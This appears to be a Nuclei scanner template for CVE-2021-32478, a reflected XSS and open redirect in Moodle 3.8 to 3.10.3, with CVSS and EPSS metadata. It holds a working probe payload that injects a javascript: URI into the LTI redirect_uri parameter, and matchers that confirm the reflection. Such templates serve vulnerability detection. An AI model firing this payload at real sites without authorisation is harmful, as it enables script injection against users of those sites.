Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8 contain a reflected XSS and open redirect caused by insufficient sanitization of the redirect URI in the LTI authorization endpoint, letting attackers execute scripts or redirect users maliciously, exploit requires crafted URL with malicious redirect URI.
PoC代码[已公开]
id: CVE-2021-32478
info:
name: Moodle 3.8-3.10.3 - Reflected XSS & Open Redirect
author: hackergautam
severity: medium
description: |
Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8 contain a reflected XSS and open redirect caused by insufficient sanitization of the redirect URI in the LTI authorization endpoint, letting attackers execute scripts or redirect users maliciously, exploit requires crafted URL with malicious redirect URI.
reference:
- https://twitter.com/JacksonHHax/status/1391367064154042377
- https://nvd.nist.gov/vuln/detail/CVE-2021-32478
- https://moodle.org/mod/forum/discuss.php?d=422314
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-32478
cwe-id: CWE-79
epss-score: 0.03754
epss-percentile: 0.87537
cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: moodle
product: moodle
tags: cve,cve2021,moodle,xss,intrusive,vuln,vkev
http:
- method: GET
path:
- "{{BaseURL}}/mod/lti/auth.php?redirect_uri=javascript:alert('{{randstr}}')"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{randstr}}'
- '<form action="javascript:alert'
condition: and
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
# digest: 490a00463044022016e3d80f4cd15322547723e49a7d5ce44069e94ac26d353b41c392b2f130a790022022a359eb574fdfe4faef845f0927c97ef0157033580f347a7fa32c10324d0b38:922c64590222798bb761d5b6d8e72950